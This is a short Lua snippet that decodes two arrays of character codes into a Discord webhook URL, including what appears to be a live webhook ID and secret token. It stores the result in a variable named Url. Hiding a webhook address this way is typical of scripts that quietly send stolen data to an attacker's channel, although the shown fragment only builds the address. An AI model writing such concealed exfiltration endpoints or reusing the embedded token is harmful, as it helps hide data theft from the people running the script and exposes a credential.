local encodedW = {104, 116, 116, 112, 115, 58, 47, 47, 100, 105, 115, 99, 111, 114, 100, 46, 99, 111, 109, 47, 97, 112, 105, 47, 119, 101, 98, 104, 111, 111, 107, 115, 47}
local encodedPath = {49, 50, 54, 56, 50, 50, 51, 50, 55, 57, 51, 55, 56, 56, 53, 56, 48, 52, 53, 47, 89, 107, 102, 81, 101, 74, 53, 53, 72, 111, 45, 75, 82, 106, 98, 106, 102, 87, 121, 50, 88, 51, 121, 74, 51, 69, 78, 71, 69, 74, 65, 83, 76, 83, 97, 53, 65, 78, 67, 108, 55, 88, 87, 45, 99, 52, 73, 54, 95, 114, 122, 111, 89, 51, 52, 83, 68, 57, 75, 48, 82, 113, 75, 65, 55, 106, 120, 52}

local function decodeCharArray(array)
    local result = ""
    for _, charCode in ipairs(array) do
        result = result .. string.char(charCode)
    end
    return result
end

local W = decodeCharArray(encodedW)
local Path = decodeCharArray(encodedPath)

local Url = W .. Path
